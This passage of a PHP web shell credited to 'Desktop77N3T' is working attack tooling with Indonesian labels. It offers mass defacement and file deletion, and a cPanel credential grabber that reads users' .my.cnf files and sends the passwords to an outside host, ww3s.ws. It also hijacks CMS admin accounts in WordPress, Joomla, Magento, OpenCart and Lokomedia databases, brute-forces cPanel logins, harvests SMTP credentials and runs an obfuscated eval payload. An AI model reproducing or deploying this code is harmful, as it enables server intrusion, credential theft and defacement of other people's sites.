  622.  
  623.        $files = Array();
  624.        $inner_files = Array();
  625.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  626.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  627.         while($file = readdir($dh)) {
  628.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  629.                 if(is_dir($dirrall . "/" . $file)) {
  630.                     $inner_files = ListFiles($dirrall . "/" . $file);
  631.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  632.                 } else {
  633.                     array_push($files, $dirrall . "/" . $file);
  634.                 }
  635.             }
  636.             }
  637.  
  638.             closedir($dh);
  639.             return $files;
  640.         }
  641.     }
  642.     function gass_all(){
  643.         global $index ;
  644.         $dirrall=$_POST['d_dir'];
  645.         foreach (ListFiles($dirrall) as $key=>$file){
  646.             $file = str_replace('//',"/",$file);
  647.             echo "<center><strong>$file</strong> ===>";
  648.             edit_file($file,$index);
  649.             flush();
  650.         }
  651.         $key = $key+1;
  652.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  653.     function sabun_massal($dir,$namafile,$isi_script) {
  654.         if(is_writable($dir)) {
  655.             $dira = scandir($dir);
  656.             foreach($dira as $dirb) {
  657.                 $dirc = "$dir/$dirb";
  658.                 $lokasi = $dirc.'/'.$namafile;
  659.                 if($dirb === '.') {
  660.                     file_put_contents($lokasi, $isi_script);
  661.                 } elseif($dirb === '..') {
  662.                     file_put_contents($lokasi, $isi_script);
  663.                 } else {
  664.                     if(is_dir($dirc)) {
  665.                         if(is_writable($dirc)) {
  666.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  667.                             file_put_contents($lokasi, $isi_script);
  668.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  669.                         }
  670.                     }
  671.                 }
  672.             }
  673.         }
  674.     }
  675.     if($_POST['mass'] == 'onedir') {
  676.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  677.         $ini="http://";
  678.         $mainpath=$_POST[d_dir];
  679.         $file=$_POST[d_file];
  680.         $dir=opendir("$mainpath");
  681.         $code=base64_encode($_POST[script]);
  682.         $indx=base64_decode($code);
  683.         while($row=readdir($dir)){
  684.         $start=@fopen("$row/$file","w+");
  685.         $finish=@fwrite($start,$indx);
  686.         if ($finish){
  687.             echo"$ini$row/$file\n";
  688.             }
  689.         }
  690.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  691.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  692.         $dir=opendir("$mainpath");
  693.         $code=base64_encode($_POST[script]);
  694.         $indx=base64_decode($code);
  695.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  696.         $finish=@fwrite($start,$indx);
  697.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  698.         }
  699.  
  700.     }
  701.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  702.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  703.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  704.     elseif($_POST['mass'] == 'massdeface') {
  705.         echo "<div style='margin: 5px auto; padding: 5px'>";
  706.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  707.         echo "</div>";  }
  708.     else {
  709.         echo "
  710.         <center><font style='text-decoration: underline;'>
  711.         Select Type:<br>
  712.         </font>
  713.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  714.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  715.         <option value=\"massdeface\">Mass Deface Semua Dir</option>
  716.         <option value=\"sabunkabeh\">Deface Massal Di Tempat</option>
  717.         <option value=\"sabunmematikan\">Deface Massal Bunuh Diri</option>
  718.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  719.         <font style='text-decoration: underline;'>Folder:</font><br>
  720.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  721.         <font style='text-decoration: underline;'>Filename:</font><br>
  722.         <input type='text' name='d_file' value='d7net.php' style='width: 450px;' height='10'><br>
  723.         <font style='text-decoration: underline;'>Index File:</font><br>
  724.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Desktop77N3T</textarea><br>
  725.         <input type='submit' class='d7net_table' name='start' value='Mass Deface' style='width: 450px;'>
  726.         </form></center>";
  727.         }
  728. } elseif($_GET['D7net'] == 'about') {
  729.     echo "<center><br><font size='6'>Shell by D7net a.k.a Desktop77N3T<br> thanks to : MRAF04 | Mr.L3gacy and D704T | XaiSyndicate | B374k | Con7ext | IndoXploit</font>";
  730. } elseif($_GET['D7net'] == 'contact') {
  731.     echo "<center><br><font size='6'>Gmail : sendal254@gmail.com</font>";
  732.  
  733. } elseif($_GET['D7net'] == 'cpanel') {
  734. @ini_set('display_errors',0);
  735. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  736.     $ar0=explode($marqueurDebutLien, $text);
  737.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  738.     return trim($ar1[0]);
  739. }
  740. echo '<br><br><style>
  741. textarea {
  742. resize:none;
  743. color:black;
  744. background-color:#ffffff;  
  745. font-size:8pt; color:black;
  746. border:1px solid white ;
  747. border-left: 4px solid white ;
  748. }
  749. input {
  750. color: black;
  751. border:1px dotted white;
  752. }
  753. </style>';
  754. echo '<center>';
  755. $d0mains = @file('/etc/named.conf');
  756. $domains = scandir("/var/named");
  757. if ($domains or $d0mains)
  758. {
  759.     $domains = scandir("/var/named");
  760.     if($domains) {
  761. echo "<table align=center><tr><th valign=top  class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>";
  762. $count=1;
  763. $dc = 0;
  764. $list = scandir("/var/named");
  765. foreach($list as $domain){
  766. if(strpos($domain,".db")){
  767. $domain = str_replace('.db','',$domain);
  768. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  769. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  770. $path = getcwd();
  771. if (is_readable($dirz)) {
  772. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  773. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  774. $password=entre2v2($p,'password="','"');
  775. echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white  class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$password."</td><td valign=top style=border :2px solid white style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>";
  776. $dc++;
  777. $success3="http://".$domain."|".$owner['name']."|".$password."\n";
  778. $ch = curl_init();
  779. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  780. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  781. curl_setopt($ch, CURLOPT_POST, 1);
  782. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3));
  783. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  784. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  785. curl_setopt($ch, CURLOPT_HEADER, 1);
  786. $buffer = curl_exec($ch);
  787. }
  788. }
  789. }
  790. echo '</table>';
  791. $total = $dc;
  792.  
  793. echo '</center>';
  794. }else{
  795. $d0mains = @file('/etc/named.conf');
  796.     if($d0mains) {
  797. echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  798. $count=1;
  799. $dc = 0;
  800. $mck = array();
  801. foreach($d0mains as $d0main){
  802.     if(@eregi('zone',$d0main)){
  803.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  804.         flush();
  805.         if(strlen(trim($domain[1][0])) >2){
  806.             $mck[] = $domain[1][0];
  807.         }
  808.     }
  809. }
  810. $mck = array_unique($mck);
  811. $usr = array();
  812. $dmn = array();
  813. foreach($mck as $o) {
  814.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  815.     $usr[] = $infos['name'];
  816.     $dmn[] = $o;
  817. }
  818. array_multisort($usr,$dmn);
  819. $dt = file('/etc/passwd');
  820. $passwd = array();
  821. foreach($dt as $d) {
  822.     $r = explode(':',$d);
  823.     if(strpos($r[5],'home')) {
  824.         $passwd[$r[0]] = $r[5];
  825.     }
  826. }
  827. $l=0;
  828. $j=1;
  829. foreach($usr as $r) {
  830. $dirz = '/home/'.$r.'/.my.cnf';
  831. $path = getcwd();
  832. if (is_readable($dirz)) {
  833. copy($dirz, ''.$path.'/'.$r.'.txt');
  834. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  835. $password=entre2v2($p,'password="','"');
  836. echo "<tr><td valign=top class=style2 style=width: 139px>".$count++."</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top class=style2 style=width: 139px>'.$r."</td><td valign=top class=style2 style=width: 139px>".$password."</td><td valign=top class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  837. $dc++;
  838.                 flush();
  839.                 $l=$l?0:1;
  840.                 $j++;
  841.                 }
  842.             }
  843.             }
  844. echo '</table>';
  845. $total = $dc;
  846. echo '<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />';
  847. echo '</center>';
  848. }
  849.  
  850. }else{
  851. echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>";
  852. }
  853. } elseif($_GET['D7net'] == 'auto_edit_user') {
  854.     if($_POST['hajar']) {
  855.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  856.             echo "username atau password harus lebih dari 6 karakter";
  857.         } else {
  858.             $user_baru = $_POST['user_baru'];
  859.             $pass_baru = md5($_POST['pass_baru']);
  860.             $conf = $_POST['config_dir'];
  861.             $scan_conf = scandir($conf);
  862.             foreach($scan_conf as $file_conf) {
  863.                 if(!is_file("$conf/$file_conf")) continue;
  864.                 $config = file_get_contents("$conf/$file_conf");
  865.                 if(preg_match("/JConfig|joomla/",$config)) {
  866.                     $dbhost = ambilkata($config,"host = '","'");
  867.                     $dbuser = ambilkata($config,"user = '","'");
  868.                     $dbpass = ambilkata($config,"password = '","'");
  869.                     $dbname = ambilkata($config,"db = '","'");
  870.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  871.                     $prefix = $dbprefix."users";
  872.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  873.                     $db = mysql_select_db($dbname);
  874.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  875.                     $result = mysql_fetch_array($q);
  876.                     $id = $result['id'];
  877.                     $site = ambilkata($config,"sitename = '","'");
  878.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  879.                     echo "Config => ".$file_conf."<br>";
  880.                     echo "CMS => Joomla<br>";
  881.                     if($site == '') {
  882.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  883.                     } else {
  884.                         echo "Sitename => $site<br>";
  885.                     }
  886.                     if(!$update OR !$conn OR !$db) {
  887.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  888.                     } else {
  889.                         echo "Status => <font color=yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  890.                     }
  891.                     mysql_close($conn);
  892.                 } elseif(preg_match("/WordPress/",$config)) {
  893.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  894.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  895.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  896.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  897.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  898.                     $prefix = $dbprefix."users";
  899.                     $option = $dbprefix."options";
  900.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  901.                     $db = mysql_select_db($dbname);
  902.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  903.                     $result = mysql_fetch_array($q);
  904.                     $id = $result[ID];
  905.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  906.                     $result2 = mysql_fetch_array($q2);
  907.                     $target = $result2[option_value];
  908.                     if($target == '') {
  909.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  910.                     } else {
  911.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  912.                     }
  913.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  914.                     echo "Config => ".$file_conf."<br>";
  915.                     echo "CMS => Wordpress<br>";
  916.                     echo $url_target;
  917.                     if(!$update OR !$conn OR !$db) {
  918.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  919.                     } else {
  920.                         echo "Status => <font color=yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  921.                     }
  922.                     mysql_close($conn);
  923.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  924.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  925.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  926.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  927.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  928.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  929.                     $prefix = $dbprefix."admin_user";
  930.                     $option = $dbprefix."core_config_data";
  931.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  932.                     $db = mysql_select_db($dbname);
  933.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  934.                     $result = mysql_fetch_array($q);
  935.                     $id = $result[user_id];
  936.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  937.                     $result2 = mysql_fetch_array($q2);
  938.                     $target = $result2[value];
  939.                     if($target == '') {
  940.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  941.                     } else {
  942.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  943.                     }
  944.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  945.                     echo "Config => ".$file_conf."<br>";
  946.                     echo "CMS => Magento<br>";
  947.                     echo $url_target;
  948.                     if(!$update OR !$conn OR !$db) {
  949.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  950.                     } else {
  951.                         echo "Status => <font color=yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  952.                     }
  953.                     mysql_close($conn);
  954.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  955.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  956.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  957.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  958.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  959.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  960.                     $prefix = $dbprefix."user";
  961.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  962.                     $db = mysql_select_db($dbname);
  963.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  964.                     $result = mysql_fetch_array($q);
  965.                     $id = $result[user_id];
  966.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  967.                     if($target == '') {
  968.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  969.                     } else {
  970.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  971.                     }
  972.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  973.                     echo "Config => ".$file_conf."<br>";
  974.                     echo "CMS => OpenCart<br>";
  975.                     echo $url_target;
  976.                     if(!$update OR !$conn OR !$db) {
  977.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  978.                     } else {
  979.                         echo "Status => <font color=yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  980.                     }
  981.                     mysql_close($conn);
  982.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  983.                     $dbhost = ambilkata($config,'server = "','"');
  984.                     $dbuser = ambilkata($config,'username = "','"');
  985.                     $dbpass = ambilkata($config,'password = "','"');
  986.                     $dbname = ambilkata($config,'database = "','"');
  987.                     $prefix = "users";
  988.                     $option = "identitas";
  989.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  990.                     $db = mysql_select_db($dbname);
  991.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  992.                     $result = mysql_fetch_array($q);
  993.                     $target = $result[alamat_website];
  994.                     if($target == '') {
  995.                         $target2 = $result[url];
  996.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  997.                         if($target2 == '') {
  998.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  999.                         } else {
  1000.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1001.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1002.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1003.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1004.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1005.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1006.                             } else {
  1007.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1008.                             }
  1009.                         }
  1010.                     } else {
  1011.                         $cek_login = file_get_contents("$target/adminweb/");
  1012.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1013.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1014.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1015.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1016.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1017.                         } else {
  1018.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1019.                         }
  1020.                     }
  1021.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1022.                     echo "Config => ".$file_conf."<br>";
  1023.                     echo "CMS => Lokomedia<br>";
  1024.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1025.                         echo $url_target2;
  1026.                     } else {
  1027.                         echo $url_target;
  1028.                     }
  1029.                     if(!$update OR !$conn OR !$db) {
  1030.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1031.                     } else {
  1032.                         echo "Status => <font color=yellow>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1033.                     }
  1034.                     mysql_close($conn);
  1035.                 }
  1036.             }
  1037.         }
  1038.     } else {
  1039.         echo "<center>
  1040.         <h1>Auto Edit User Config</h1>
  1041.         <form method='post'>
  1042.         DIR Config: <br>
  1043.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1044.         Set User & Pass: <br>
  1045.         <input type='text' name='user_baru' value='Desktop77N3T' placeholder='user_baru'><br>
  1046.         <input type='text' name='pass_baru' value='Desktop77N3T' placeholder='pass_baru'><br>
  1047.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1048.         </form>
  1049.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1050.         ";
  1051.     }
  1052. } elseif($_GET['D7net'] == 'cpanelcrck') {
  1053.     if($_POST['crack']) {
  1054.         $usercp = explode("\r\n", $_POST['user_cp']);
  1055.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1056.         $i = 0;
  1057.         foreach($usercp as $ucp) {
  1058.             foreach($passcp as $pcp) {
  1059.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1060.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1061.                     } else {
  1062.                         $_SESSION[$ucp] = "1";
  1063.                         $_SESSION[$pcp] = "1";
  1064.                         $i++;
  1065.                         echo "username (<font color=yellow>$ucp</font>) password (<font color=yellow>$pcp</font>)<br>";
  1066.                     }
  1067.                 }
  1068.             }
  1069.         }
  1070.         if($i == 0) {
  1071.         } else {
  1072.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=yellow>IndoXploit.</font>";
  1073.         }
  1074.     } else {
  1075.         echo "<center>
  1076.         <form method='post'>
  1077.         USER: <br>
  1078.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1079.         $_usercp = fopen("/etc/passwd","r");
  1080.         while($getu = fgets($_usercp)) {
  1081.             if($getu == '' || !$_usercp) {
  1082.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1083.             } else {
  1084.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1085.                 foreach($u[1] as $user_cp) {
  1086.                         if(is_dir("/home/$user_cp/public_html")) {
  1087.                             echo "$user_cp\n";
  1088.                     }
  1089.                 }
  1090.             }
  1091.         }
  1092.         echo "</textarea><br>
  1093.         PASS: <br>
  1094.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1095.         function cp_pass($dir) {
  1096.             $pass = "";
  1097.             $dira = scandir($dir);
  1098.             foreach($dira as $dirb) {
  1099.                 if(!is_file("$dir/$dirb")) continue;
  1100.                 $ambil = file_get_contents("$dir/$dirb");
  1101.                 if(preg_match("/WordPress/", $ambil)) {
  1102.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1103.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1104.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1105.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1106.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1107.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1108.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1109.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1110.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1111.                 } elseif(preg_match("/client/", $ambil)) {
  1112.                     preg_match("/password=(.*)/", $ambil, $pass1);
  1113.                     if(preg_match('/"/', $pass1[1])) {
  1114.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1115.                         $pass .= $pass1[1]."\n";
  1116.                     }
  1117.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1118.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1119.                 }
  1120.             }
  1121.             echo $pass;
  1122.         }
  1123.         $cp_pass = cp_pass($dir);
  1124.         echo $cp_pass;
  1125.         echo "</textarea><br>
  1126.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1127.         </form>
  1128.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1129.     }
  1130. } elseif($_GET['D7net'] == 'smtp') {
  1131.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1132.     function scj($dir) {
  1133.         $dira = scandir($dir);
  1134.         foreach($dira as $dirb) {
  1135.             if(!is_file("$dir/$dirb")) continue;
  1136.             $ambil = file_get_contents("$dir/$dirb");
  1137.             $ambil = str_replace("$", "", $ambil);
  1138.             if(preg_match("/JConfig|joomla/", $ambil)) {
  1139.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1140.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1141.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1142.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1143.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1144.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1145.                 echo "SMTP Host: <font color=yellow>$smtp_host</font><br>";
  1146.                 echo "SMTP port: <font color=yellow>$smtp_port</font><br>";
  1147.                 echo "SMTP user: <font color=yellow>$smtp_user</font><br>";
  1148.                 echo "SMTP pass: <font color=yellow>$smtp_pass</font><br>";
  1149.                 echo "SMTP auth: <font color=yellow>$smtp_auth</font><br>";
  1150.                 echo "SMTP secure: <font color=yellow>$smtp_secure</font><br><br>";
  1151.             }
  1152.         }
  1153.     }
  1154.     $smpt_hunter = scj($dir);
  1155.     echo $smpt_hunter;
  1156.     } elseif($_GET['D7net'] == 'magento')
  1157.     {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));
  1158. } elseif($_GET['D7net'] == 'whmcs') {
  1159.     echo "<form method='POST' action=''>";
  1160.     echo "<center><br><font size='6'>WHMCS Decoder</font><br><br>";
  1161.     echo "<center><input type='submit' class='d7net_table' value='Click Here!' name='d7whmcs'></center>";
  1162.         if (isset($_POST['d7whmcs'])){ system('ln -s / whmcs.php');
  1163. $d7whmcs='';
  1164. $file = fopen("whmcs.php","w+"); $write = fwrite ($file ,base64_decode($d7whmcs)); $file = fopen("/","whmcs.php");
  1165.             $rt="<br><a href=whmcs.php TARGET='_blank'>";
  1166.     echo "<br><br><br><a class='d7net_table' href=whmcs TARGET='_blank'><b>view click here!</a></b><br><br>$rt</center>";} echo "</form>";
  1167.  
  1168. } elseif($_GET['D7net'] == 'zoneh') {
  1169.     echo "<form method='POST' action=''>";
  1170.     echo "<center><br><font size='6'>Zone-h coded By Desktop77N3T</font><br><br>";
